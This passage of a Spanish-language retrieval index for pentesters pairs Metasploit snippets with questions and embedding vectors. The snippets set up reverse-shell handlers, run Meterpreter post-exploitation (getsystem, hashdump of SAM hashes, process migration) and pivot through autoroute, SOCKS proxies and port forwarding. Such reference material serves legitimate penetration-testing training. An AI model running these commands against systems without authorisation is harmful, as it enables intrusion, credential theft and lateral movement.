-0.03374, 0.00988, -0.05187, 0.0796, 0.05094, -0.05948, -0.02038, -0.02705, 0.01208, 0.01968, -0.03959, 0.03078, -0.05078, -0.03577, 0.01813, 0.04893, 0.06091, -0.05681, 0.01589, 0.04589, 0.03872, 0.07089, -0.00159, -0.0418, 0.05093, -0.00939, -0.01728, 0.04876, 0.03048, 0.04073, -0.03325, -0.02909, -0.01906, 0.07272, -0.03837, -0.02104, 0.04314, -0.05152, -0.00337, 0.00109, 0.10272, -0.00998, -0.02431, -0.04665, -0.02714, -0.02207, -0.01515, -0.00535, -0.07568, -0.02625, 0.03232, 0.06663, -0.10471, 0.02329, -0.02907]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "que programa puedo usar para recibir un payload de Metasploit en Windows?", "v": [0.01491, 0.08224, -0.15432, -0.1697, 0.00766, 0.00458, 0.00766, -0.11629, -0.13134, -0.06435, -0.08861, -0.05461, 0.00355, -0.0294, -0.19, 0.0402, -0.03344, -0.0612, 0.00518, -0.09243, -0.00594, -0.02629, -0.08935, -0.08048, -0.00404, 0.25347, 0.02283, 0.02205, -0.12563, 0.02745, 0.00588, 0.01761, -0.03161, -0.06999, 0.0143, -0.01267, 0.00661, 0.10069, 0.11284, 0.0846, 0.01992, 0.10823, -0.05846, 0.09266, 0.16793, -0.01871, 0.08794, -0.07193, -0.01971, -0.08131, -0.00558, 0.01248, -0.06393, 0.0405, 0.00112, -0.11617, 0.11412, -0.09338, -0.07612, 0.06726, 0.01175, 0.1395, -0.02498, 0.00706, -0.02618, -0.05559, 0.0779, 0.0456, -0.09119, 0.03262, -0.0285, -0.00296, 0.03266, 0.00423, 0.03616, 0.05367, -0.11162, -0.0246, 0.13131, 0.02852, 0.0232, 0.05829, -0.02046, 0.00764, -0.07892, -0.06704, 0.02324, -0.0289, 0.09411, -0.08899, 0.04573, -0.02438, -0.08212, 0.09011, 0.00428, -0.08039, 0.02198, -0.00621, 0.04678, 0.11823, 0.06814, -0.05649, 0.05598, 0.07467, -0.0071, 0.09824, 0.06909, -0.14688, -0.04006, -0.04836, 0.07302, -0.01901, -0.0405, -0.00384, -0.11739, -0.0245, 0.00438, -0.04172, 0.02087, 0.00443, -0.08839, 0.03993, -0.02186, 0.03182, 0.10306, -0.06183, -0.06603, 0.10432, -0.06212, 0.06058, 0.01655, 0.09128, -0.03286, -0.01031, -0.08529, -0.03814, 0.11741, -0.01428, 0.02675, -0.00245, 0.10086, 0.10356, 0.09078, 0.05495, 0.02448, 0.0202, 0.01486, -0.0061, -0.02672, -0.04573, 0.11303, -0.01285, 0.00535, -0.01455, -0.07005, -0.085, 0.07723, 0.08192, 0.01935, -0.0223, -0.02558, 0.01412, -0.07164, -0.03752, 0.01993, -0.03495, 0.0137, 0.0174, -0.03296, 0.09269, 0.01712, 0.07515, 0.03273, -0.01783, 0.01755, -0.02206, -0.01495, -0.0323, 0.00382, 0.01745, -0.17425, 0.04222, 0.07199, 0.02618, 0.00092, -0.01897, -0.05915, 0.04758, -0.01114, 0.02219, -0.01917, 0.04292, 0.04014, -0.05602, -0.03021, 0.00907, -0.04373, 0.00286, 0.04194, -0.00326, 0.00595, -0.02618, -0.03086, -0.06765, 0.07423, 0.04594, -0.08108, 0.03472, 0.09528, 0.06866, 0.05045, -0.07547, 0.06867, -0.02871, -0.05861, -0.04664, -0.00591, 0.05338, 0.01161, 0.05228, -0.01214, 0.02572, 0.03543, 0.00544, -0.01807, -0.03306, -0.01191, -0.00419, 0.05354, 0.01328, -0.02643, 0.04366, -0.01523, -0.02017, 0.02769, 0.01141, -0.00528, -0.03151, -0.04622, -0.02255, -0.03072, 0.07919, -0.04959, -0.07735, -0.04763, -0.02633, -0.0327, 0.0215, 0.00734, -0.0211, -0.00918, 0.0589, 0.03182, -0.03911, -0.00108, 0.08899]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "cual es la herramienta que sirve para capturar conexiones reversas con msfvenom?", "v": [0.2461, -0.01085, -0.05876, -0.04783, 0.03216, -0.07639, -0.13781, 0.0295, -0.00572, -0.00824, -0.12904, -0.03313, 0.01228, -0.0175, 0.06216, 0.14942, 0.14593, -0.03628, -0.02486, 0.03331, 0.06079, -0.02661, -0.063, -0.12728, -0.08207, 0.03615, 0.08463, -0.03276, -0.22724, -0.08216, 0.05343, 0.01186, 0.02828, 0.0524, -0.07836, -0.06504, -0.02483, 0.11731, 0.029, 0.07516, 0.0733, 0.0703, -0.14449, 0.03733, 0.0158, -0.10583, -0.07484, 0.02892, -0.02551, 0.08661, -0.07807, -0.04635, -0.13194, -0.03243, -0.14172, -0.11658, 0.1253, -0.08906, -0.00353, -0.0418, -0.10836, -0.0375, -0.11514, -0.07471, 0.00494, -0.16626, -0.08763, -0.05448, -0.04875, 0.0299, 0.04187, 0.12077, 0.06884, 0.01769, 0.00841, 0.00783, 0.02064, 0.06692, 0.06348, 0.0098, 0.00331, -0.14135, -0.15935, -0.00531, -0.01397, 0.02668, 0.07437, -0.03734, 0.02722, -0.15175, 0.01588, 0.08556, -0.02659, -0.01534, 0.02451, -0.06135, -0.02246, 0.00268, -0.03419, 0.03774, 0.16058, -0.04083, -0.09451, 0.08914, -0.06209, -0.00802, 0.01454, -0.00411, -0.11162, 0.071, 0.00988, -0.0054, 0.0409, 0.04545, -0.06, -0.00405, -0.02645, -0.06937, 0.04366, -0.02862, 0.03762, -0.04617, -0.03066, -0.06695, -0.00542, 0.08884, -0.02685, 0.05492, 0.02659, -0.03546, 0.0226, -0.05415, -0.05857, 0.01891, -0.03523, -0.08678, 0.13465, -0.10881, -0.03903, -0.10918, 0.02995, 0.02062, 0.00565, -0.08291, 0.01287, 0.01251, 0.07235, -0.03161, -0.02498, 0.009, -0.02215, -0.04726, -0.03766, 0.00981, 0.01349, 0.03058, 0.00143, -0.004, -0.08713, 0.05524, -0.05548, -0.04628, 0.09286, -0.03229, 0.01097, -0.11468, -0.08002, -0.03525, 0.06866, 0.01789, 0.00546, -0.04992, 0.03639, -0.04558, -0.03816, -0.04478, -0.06203, -0.01714, 0.06464, -0.08923, -0.04892, 0.03544, 0.03478, -0.03991, 0.00305, -0.01298, 0.00491, 0.03346, -0.00738, 0.04972, -0.04271, -0.00638, 0.00639, -0.04192, 0.00344, -0.03569, 0.02145, -0.02194, 0.11625, -0.00768, 0.01124, -0.01432, -0.01913, -0.0357, 0.01292, 0.05923, -0.04688, 0.00405, -0.02791, -0.00914, 0.01203, 0.02864, 0.0435, -0.03111, 0.01317, -0.05439, 0.00681, 0.02757, -0.03057, 0.08427, 0.04185, 0.02044, 0.01755, 0.07816, 0.00911, -0.02628, 0.00171, -0.00542, -0.01389, -0.03972, 0.02417, -0.01499, -0.036, -0.01371, -0.00929, -0.02468, 0.03222, -0.02911, -0.05663, -0.04135, 0.00344, 0.05718, -0.0567, -0.02962, 0.00164, -0.01539, -0.0356, 1e-05, -0.00263, -0.066, -0.01435, 0.03752, 0.06847, -0.02056, 0.05045, -0.00062]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "como montar una shell reverse tcp para Windows sin usar metasploit?", "v": [0.02581, -0.12315, -0.14611, -0.16183, -0.05397, -0.02646, -0.15936, -0.02151, 0.00765, 0.00844, -0.12643, 0.0259, 0.04036, -0.04371, 0.01898, 0.00985, -0.09083, -0.13843, 0.1471, -0.15093, -0.09293, -0.12115, -0.11795, -0.11776, -0.0177, 0.21452, 0.02038, -0.00718, -0.11674, -0.01887, -0.04451, -0.0894, -0.01887, 0.02468, -0.04707, -0.0198, -0.00696, 0.00389, 0.06409, 0.08613, -0.03909, 0.03475, -0.11174, 0.14161, 0.15593, -0.07378, 0.12931, -0.12581, 0.04894, -0.04613, -0.05799, -0.05409, -0.1531, 0.03861, -0.03737, -0.02886, 0.13538, -0.03675, 0.04204, -0.0476, -0.09174, 0.1715, -0.06115, 0.08969, 0.0364, -0.06461, -0.03721, -0.02932, -0.15859, 0.07007, -0.0055, 0.06803, 0.02234, 0.01521, 0.06789, 0.00298, 0.01384, -0.07193, 0.14856, -0.0071, -0.0372, -0.03159, -0.05706, 0.03981, -0.08257, -0.14338, 0.04698, 0.02909, 0.06703, -0.02145, 0.02141, 0.03009, -0.05058, -0.00116, 0.04714, -0.19093, -0.06173, 0.07059, -0.05187, 0.07977, -0.03343, 0.01623, 0.01289, 0.15837, -0.01518, 0.03035, -0.03398, -0.03309, -0.03465, -0.0004, 0.03845, 0.0529, -0.0157, 0.0359, 7e-05, -0.13594, 0.01598, -0.05711, 0.01496, 0.02112, -0.10389, -0.01593, 0.03026, 0.04234, -0.03858, 0.01262, 0.0753, 0.07658, -0.09379, 0.0038, 0.0516, 0.03206, -0.0379, -0.0164, -0.11808, 0.07723, 0.02944, -0.04303, -0.03675, -0.00921, 0.03942, 0.0646, -0.04307, -0.00075, 0.03482, 0.0094, 0.06038, -0.03094, -0.02272, -0.01195, 0.08797, 0.0534, -0.04477, -0.03773, -0.05335, -0.07628, 0.02268, 0.06109, 0.06912, 0.02521, 0.00035, 0.00459, -0.05554, 0.00787, 0.04136, -0.01558, -0.01727, 0.08744, 0.06367, -0.02254, 0.01998, 0.06659, 0.06029, -0.0312, 0.07936, -0.02317, 0.04053, 0.00923, -0.00525, 0.01414, -0.04283, -0.03175, 0.0906, -0.03177, 0.00234, 0.01873, 0.03795, 0.03408, -0.0383, -0.02607, -0.01327, 0.00517, 0.04008, -0.00292, 0.02568, -0.01777, -0.00138, -0.03277, 0.03988, 0.0436, -0.01288, -0.02664, 0.03473, -0.06231, 0.06978, -0.01065, -0.07964, 0.02577, 0.05961, 0.01846, 0.00645, 0.00679, -0.01187, 0.04633, -0.02985, -0.01795, 0.02181, 0.01518, -0.03377, 0.02184, -0.00267, -0.00382, -0.02482, 0.02615, 0.02353, -0.01437, -0.04277, -0.01875, 0.00457, -0.01565, -0.00486, 0.03589, 0.022, 0.03963, -0.0268, -0.01584, -0.02017, -0.02841, 0.01851, -0.05727, -0.01994, 0.04154, 0.00784, -0.05327, 0.01406, 0.0081, -0.01237, 0.00757, -0.02199, -0.02736, -0.02055, -0.02883, 0.00611, -0.01602, -0.09183, 0.01897]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "que programa sirve para volcar los hashes del sistema?", "v": [0.02791, -0.09754, -0.0842, -0.10816, 0.0257, -0.18869, -0.00338, -0.12148, 0.05795, -0.01963, -0.11885, -0.07689, -0.02988, -0.07701, 0.04494, 0.06636, 0.03389, -0.16182, -0.00477, 0.10886, -0.03025, -0.00412, -0.10751, -0.03666, -0.10076, 0.09721, -0.06215, -0.00768, -0.24444, 0.00194, 0.01503, -0.05673, -0.01442, -0.08339, -0.09087, 0.04136, 0.00744, 0.03777, 0.02794, 0.07058, 0.02902, 0.02493, -0.03194, 0.02675, 0.06081, -0.09796, 0.03162, 0.0524, 0.05365, -0.05619, 0.03983, -0.00114, -0.09374, 0.02983, 0.12508, -0.14381, -0.1044, -0.10045, -0.17658, -0.01727, -0.01101, 0.03808, 0.04544, -0.08445, 0.06924, -0.03662, 0.07475, -0.03855, -0.07645, 0.05825, -0.01029, 0.06287, 0.11959, -0.02544, -0.04237, 0.03918, -0.02944, 0.01764, 0.04971, -0.06321, 0.0096, -0.01449, -0.00874, 0.1015, -0.00671, 0.04116, 0.05108, -0.02615, 0.0202, 0.00974, 0.0027, 0.068, 0.05169, 0.13298, 0.09302, -0.04461, 0.06171, 0.01916, 0.01404, -0.00564, 0.04327, -0.06415, -0.10233, 0.1058, -0.08591, 0.03284, 0.12053, -0.03275, 0.04492, 0.04705, 0.05681, -0.00877, -0.02645, -0.03475, -0.1074, -0.04126, 0.00207, 0.07243, 0.00353, -0.01139, -0.09492, 0.04555, 0.00122, -0.0023, 0.16803, -0.0076, -0.03398, 0.11335, 0.02976, 0.08228, 0.06671, 0.02111, -0.05904, 0.03593, -0.00287, -0.09666, 0.02912, 0.03832, 0.00767, -0.03784, 0.05382, 0.15681, 0.03238, -0.04494, 0.03408, -0.03712, 0.04572, -0.06168, 0.05913, -0.04549, -0.00185, 0.04819, -0.00619, -0.00467, -0.06812, -0.05494, 0.0287, -0.04177, -0.06416, 0.00439, -0.03857, -0.03308, 0.005, 0.01069, 0.03727, -0.02295, -0.00873, -0.05561, 0.11751, 0.1137, 0.01789, 0.02745, 0.09895, -0.0766, -0.01476, 0.00599, 0.00016, -0.09144, 0.01031, 0.00108, -0.1089, 0.02351, 0.07108, 0.01297, -0.01468, -0.02657, -0.04917, 0.10007, 0.00454, -0.03727, 0.03826, 0.016, -0.02603, 0.01026, -0.0129, 0.0121, -0.03162, -0.03744, 0.06634, -0.02264, -0.06273, 0.0286, 0.02417, -0.03269, 0.03729, 0.10024, 0.05418, -0.02147, 0.09163, 0.11702, 0.02086, 0.02167, 0.06039, 0.04755, -0.06563, 0.00164, -0.02352, 0.06254, 0.05925, 0.00109, 0.01916, -0.00362, 0.00937, 0.08753, -0.02396, -0.0778, 0.03001, 0.08645, 0.05205, -0.03543, -0.02368, -0.09752, -0.00129, 0.00022, -0.01079, -0.04828, -0.01924, 0.00283, -0.03612, -0.12, -0.00397, 0.10389, -0.00661, -0.06306, -0.01012, -0.03826, -0.05079, 0.00293, 0.03761, -0.01797, -0.05423, 0.03304, 0.00918, -0.04012, 0.01993, 0.02196]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "con que puedo intentar elevar mis privilegios al nivel SYSTEM?", "v": [-0.00981, -0.02628, -0.28981, -0.13601, 0.15201, 0.00451, -0.06106, -0.08683, -0.18167, -0.03959, -0.06759, 0.09268, 0.00684, -0.01766, 0.11921, 0.12718, -0.04106, -0.05507, -0.1288, 0.0623, 0.03032, -0.06962, -0.11286, -0.05088, 0.11239, 0.04946, -0.14448, -0.07733, -0.09594, 0.06008, -0.0233, 0.15082, 0.04323, -0.10884, 0.14647, -0.01723, -0.00335, 0.12967, -0.02794, -0.07994, 0.01755, 0.0205, 0.08811, -0.06651, 0.10846, -0.08276, -0.04869, -0.04593, 0.06057, -0.06671, -0.02965, -0.01142, -0.08193, -0.23128, -0.01408, 0.00521, -0.00192, 0.02724, 0.01871, 0.0353, 0.052, -0.07322, 0.03299, -0.02515, 0.01864, 0.02809, 0.00942, -0.02113, 0.0041, 0.17662, -0.08141, -0.07056, 0.09827, -0.01875, 0.07859, 0.04028, -0.05635, -0.07797, 0.02721, -0.04352, -0.07093, -0.06882, -0.09122, 0.05114, -0.01163, -0.09869, -0.03471, 0.05813, 0.02594, -0.10613, 0.07565, -0.00338, 0.00778, -0.06052, 0.02561, -0.001, 0.00276, 0.05844, -0.04878, 0.01541, 0.10776, -0.04659, 0.0237, 0.11434, 0.00263, -0.02663, 0.06032, -0.06738, 0.12379, -0.03619, -0.05683, -0.0078, 0.02831, -0.06369, -0.10045, -0.03404, -0.02068, 0.03866, -0.11394, -0.02498, 6e-05, -0.05675, -0.00477, -0.0366, 0.08991, -0.0035, 0.01342, 0.06787, 0.03024, 0.04435, -0.03268, 0.0518, 0.08171, -0.00137, 0.07145, 0.02074, -0.01191, -0.00389, -0.04074, -0.00785, 0.06438, 0.07584, 0.02577, -0.06969, 0.04412, 0.042, 0.02891, -0.00889, -0.03757, -0.07981, -0.03342, 0.00286, 0.02535, 0.06791, -0.01703, -0.00318, 0.04457, -0.0917, 0.01395, -0.01298, -0.00423, 0.03509, -0.02755, -0.01656, -0.00061, 0.00285, -0.02491, -0.11515, 0.02176, -0.03699, -0.08022, -0.05112, 0.00035, -0.01543, 0.00794, -0.01077, 0.02043, -0.00173, 0.02056, 0.02694, -0.11263, 0.04602, 0.05456, -0.04909, -0.0132, -0.03596, -0.04827, 0.00873, 0.09102, 0.0473, 0.08472, 0.06987, -0.03728, 0.00231, -0.02562, -0.052, -0.03684, -0.02351, 0.00238, 0.0102, -0.03794, 0.00187, -0.00591, -0.02819, -0.04092, -0.00315, 0.07786, -0.02666, -0.00118, 0.06179, 0.00775, 0.01583, 0.06496, -0.05265, -0.02036, 0.02626, 0.00507, -0.01998, -0.04229, -0.04631, -0.00215, -0.0046, 0.10948, 0.03874, 0.01487, 0.01798, -0.00468, -0.00175, 0.03104, 0.00574, -0.00801, -0.04102, 0.03134, -0.02518, 0.01372, 0.00175, 0.02899, -0.03576, -0.05177, -0.02637, 0.01001, 0.08363, 0.02053, -0.06508, -0.0049, -0.04225, -0.06388, -0.04071, 0.05772, -0.01829, 0.01254, -0.00819, -0.01474, -0.10447, 0.07266, 0.01058]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "existe alguna herramienta para mover una sesiΓ³n de un proceso a otro?", "v": [-0.08179, 0.13831, -0.19846, -0.18391, -0.12515, -0.10158, -0.12297, 0.04546, -0.05232, -0.15478, -0.2292, 0.00826, 0.10615, -0.03113, 0.06846, 0.00857, 0.13939, -0.04825, -0.06903, 0.01366, -0.03813, 0.09931, -0.0393, -0.0113, 0.02335, 0.0595, 0.07895, -0.05407, -0.18098, -0.02731, -0.01972, 0.02018, 0.15099, -0.08496, -0.06552, -0.15569, -0.03771, -0.0189, 0.02247, 0.05481, -0.07606, 0.08023, -0.08112, 0.08485, 0.00405, 0.00039, -0.09049, 0.01834, -0.02972, 0.06043, 0.11954, -0.09671, -0.06582, 0.03373, -0.02016, -0.10079, 0.16373, -0.11212, 0.0267, -0.10236, -0.09561, 0.09406, -0.1216, -0.02575, 0.04943, -0.00956, 0.06314, -0.08474, -0.05036, 0.14854, -0.06943, -0.0301, 0.02128, 0.02995, 0.03989, -0.084, 0.07418, -0.04461, 0.00152, 0.06756, 0.03258, 0.08337, -0.04245, 0.01667, -0.1099, -0.08193, 0.06865, -0.0345, 0.08049, 0.02779, -0.06777, 0.0661, -0.00954, -0.04479, 0.07027, 0.0469, -0.00021, -0.0491, 0.00669, 0.01831, 0.15627, 0.00506, -0.02813, 0.03018, -0.0467, -0.01013, -0.00308, 0.01238, -0.07226, -0.05386, 0.06543, 0.09746, 0.00953, 0.0066, -0.0249, 0.02082, -0.07626, -0.04041, -0.05774, -0.01312, 0.04343, 0.01671, -0.03169, -0.07649, -0.03187, -0.09806, -0.01711, 0.07649, -0.0428, -0.04768, 0.02407, -0.0489, -0.06119, -0.06283, -0.04766, -0.04797, 0.12124, -0.03709, 0.04096, -0.1148, 0.00903, 0.08241, -0.04655, -0.06942, 0.02672, 0.0345, 0.05264, 0.00557, -0.01468, -0.00394, 0.03447, -0.08292, 0.05735, 0.01422, -0.03143, 0.01815, -0.0358, 0.01045, -0.08823, 0.00487, -0.05019, -0.02792, -0.02064, -0.05668, -0.03211, -0.04073, 0.00128, 0.0433, 0.02728, 0.02341, 0.01894, 0.00404, 0.05707, 0.01013, 0.05553, 0.02164, -0.11866, -0.02198, 0.00667, -0.09359, 0.05508, -0.00421, 0.04925, -0.03164, 0.02265, 0.00546, 0.01438, -0.00939, -0.06003, 0.05133, 0.03692, 0.02391, -0.06, -0.06708, 0.01263, 0.04413, 0.02084, -0.07476, 0.04876, 0.01154, -0.04723, -0.03827, 0.0651, 0.02577, -0.02975, 0.04252, -0.00386, -0.03222, 0.0287, -0.04449, 0.03266, 0.057, 0.01489, 0.02353, 0.0066, 0.02421, -0.06394, 0.01537, -0.02683, -0.02953, 0.00896, 0.01267, 0.03241, 0.0289, -0.00934, 0.04391, -0.00359, -0.01074, -0.0318, 0.0016, 0.06682, 0.0027, 0.03706, 0.02846, -0.0022, -0.01422, 0.0621, -0.04439, -0.03302, 0.01317, -0.02287, 0.00506, 0.01356, -0.05595, -0.01261, -0.00668, -0.00962, -0.03143, -0.0482, -0.04124, -0.02693, -0.03751, 0.02507, -0.04789, 0.0275, 0.01754]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "indexar": "ΒΏQuΓ© herramienta puedo usar para meterme en una shell remota con Metasploit?", "v": [-0.05928, 0.00359, -0.09958, -0.13271, 0.01354, -0.01167, -0.20411, -0.05469, -0.0581, -0.04094, -0.2054, 0.03356, 0.10948, -0.08796, 0.06362, 0.05114, -0.01645, -0.09338, -0.02636, -0.14623, -0.00277, -0.10371, -0.13605, -0.08248, -0.12189, 0.08522, 0.16264, 0.11395, -0.13081, -0.06957, -0.0258, -0.0157, 0.00598, -0.06301, -0.05579, -0.08294, 0.03961, -0.0033, 0.10995, 0.06844, -0.01981, 0.00398, -0.05491, 0.05515, 0.16209, -0.00055, -0.02344, -0.08465, -0.0733, 0.07717, -0.1279, -0.09706, -0.13256, 0.08072, -0.03267, -0.07925, 0.24985, -0.07783, 0.00887, -0.06712, -0.0729, -0.02765, -0.02606, -0.01622, -0.03665, -0.12324, -0.07165, -0.08092, -0.1751, 0.02934, -0.01654, -0.01227, 0.0134, 0.0571, -0.02697, 0.08096, -0.08792, -0.05179, 0.09394, -0.01088, -0.05004, -0.02922, -0.04845, -0.03694, -0.09829, -0.09241, 0.03307, -0.0492, 0.05409, -0.04563, -0.02541, 0.02062, 0.00452, 0.00412, -0.02197, -0.05598, -0.03615, 0.01737, -0.07503, 0.00378, 0.11114, -0.01439, -0.00324, 0.10608, -0.02984, -0.01558, -0.0325, -0.0266, -0.08928, -0.01426, 0.11679, 0.01007, -0.05809, 0.01968, -0.06376, 0.07186, -0.03535, -0.11056, -0.03207, -0.0182, 0.0432, 0.02077, -0.05738, -0.02722, 0.04595, 0.02527, -0.07118, 0.08747, -0.00643, -0.06205, 0.0136, 0.01697, -0.05855, -0.01607, -0.00595, 0.01993, 0.07491, -0.14006, -0.01848, -0.01531, -0.01849, 0.01387, -0.07107, -0.02999, 0.01705, -0.01607, -0.02586, -0.005, -0.03567, -0.03629, 0.09423, -0.08354, -0.00789, 0.04061, -0.08045, -0.04227, -0.02795, 0.02881, -0.07428, 0.00127, -0.02764, -0.09747, 0.02863, -0.05436, 0.02001, -0.0776, 0.0579, -0.00783, -0.0254, 0.06654, 0.01445, 0.07168, 0.07302, -0.02817, 0.03545, -0.06694, 7e-05, -0.02313, -0.0281, -0.05119, -0.04263, 0.01323, 0.01263, -0.03464, 0.09278, -0.00638, 0.0723, -0.04089, -0.01718, 0.05086, -0.01678, 0.03238, 0.02702, -0.04229, 0.01077, 0.04009, 0.03061, -0.06577, 0.02535, 0.00879, -0.02107, -0.02331, -0.01326, -0.06112, 0.10046, 0.00922, -0.04657, 0.00403, 0.00747, 0.0354, 0.01358, -0.04353, 0.05787, -0.00096, -0.0163, -0.00062, 0.00434, 0.04559, -0.03421, -0.00413, -0.02354, 0.03489, 0.03545, -0.01323, -0.00064, 0.05844, 0.04397, -0.04137, -0.00972, -0.01302, -0.00696, -0.00336, 0.0024, -0.01763, -0.01489, -0.06969, 0.02357, -0.04676, -0.00097, 0.01462, -0.03891, 0.10794, -0.0022, 0.01149, -0.03951, -0.02211, -0.02247, 0.01366, -0.05251, -0.06763, -0.05666, -0.02469, 0.0441, -0.04415, -0.00582, 0.05794]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "indexar": "ΒΏCΓ³mo puedo ejecutar una sesiΓ³n de shell en segundo plano desde la terminal?", "v": [-0.13346, 0.10353, -0.08752, -0.12648, -0.03013, -0.1175, -0.07368, -0.07541, 0.03747, 0.08172, -0.28177, 0.10571, 0.08082, -0.112, 0.03069, 0.01867, -0.05784, -0.03624, 0.0955, -0.09368, -0.03127, 0.0114, -0.06606, 0.06836, 0.02413, 0.08848, 0.06902, 0.04174, -0.0607, -0.17392, -0.03384, -0.17035, 0.1658, -0.09041, 0.0115, 0.03012, 0.03991, 0.05132, 0.00314, 0.08916, -0.09142, -0.00489, -0.07447, 0.06436, 0.14762, -0.03952, 0.05962, -0.01699, 0.00125, -0.08673, 0.06174, 0.07461, -0.08657, 0.0674, -0.00272, -0.00571, 0.15739, -0.17089, 0.07684, -0.08012, -0.04479, 0.00871, 0.09074, 0.07793, 0.06085, 0.03663, -0.0327, 0.06351, -0.00161, 0.09338, -0.08928, -0.02416, 0.02665, 0.08239, 0.07427, -0.05253, -0.01501, 0.02939, 0.05442, 0.04457, -0.01748, -0.04474, -0.05023, 0.04514, -0.08098, -0.02105, -0.11793, 0.08658, 0.03332, 0.06722, 0.00884, -0.08066, 0.02678, 0.0521, -0.0017, -0.02898, -0.01933, 0.01393, -0.04577, 0.04668, 0.10875, 0.03805, -0.05934, 0.12844, -0.00455, 0.02576, 0.0051, 0.04623, -0.05135, -0.01273, -0.0114, -0.01244, 0.02151, -0.04707, -0.07886, -0.04254, -0.03375, -0.04013, 0.02477, 0.00674, -0.06348, -0.00489, -0.06851, 0.0024, 0.02141, -0.02994, -0.02689, 0.06398, 0.01894, 0.00538, 0.00906, 0.03869, 0.1174, -0.00835, -0.10587, 0.07966, 0.06347, -0.13282, -0.09343, -0.07612, -0.00444, 0.08851, -0.03128, -0.00612, 0.06703, 0.00152, 0.02847, -0.02427, -0.07117, -0.02083, 0.03384, -0.03565, -0.00652, 0.02449, -0.06037, -0.02427, 0.0234, 0.01462, 0.02242, 0.08403, -0.0734, -0.07735, -0.12248, 0.03882, 0.01436, -0.03891, -0.12202, -0.05944, 0.03407, 0.04125, 0.05671, 0.00477, 0.02602, -0.0587, 0.08423, -0.08417, 0.00213, -0.00518, 0.05984, 0.03598, 0.0118, 0.00182, -0.01625, -0.00101, -0.01877, -0.038, 0.03396, 0.01832, 0.02934, 0.09545, 0.0697, 0.03571, 0.02394, -0.02596, -0.01852, -0.02233, 0.06108, -0.01205, -0.0515, 0.00152, 0.00621, 0.04149, 0.02196, -0.00093, 0.0455, 0.00249, -0.09255, -0.00868, -0.00158, 0.03979, -0.03602, 0.04398, 0.09631, -0.00711, 0.01911, 0.06481, -0.07353, 0.03437, 0.04499, 0.04784, -0.0126, 0.03934, 0.02237, 0.04325, 0.04006, -0.03466, -0.0159, 0.02784, -0.02181, 0.05171, -0.04648, 0.07377, 0.03189, -0.0125, 0.00213, 0.02452, 0.01496, -0.04494, 0.02407, -0.03347, 0.05325, 0.09026, 0.03554, -0.03105, -0.00435, 0.01648, -0.05697, -0.01629, -0.02438, -0.01537, -0.09885, -0.00825, 0.06508, -0.00256, -0.02777, -0.02197]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains β†’ Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow Β· Reverse shell Β· Reglas de herramientas Β· OSCP MOC", "indexar": "que programa puedo usar para activar un servidor SOCKS con proxychains?", "v": [-0.01282, 0.01655, -0.26062, -0.08355, 0.02012, -0.26274, 0.01723, -0.11349, -0.00188, 0.0114, -0.10653, -0.02893, 0.02669, -0.15688, -0.04202, 0.01972, 0.12588, 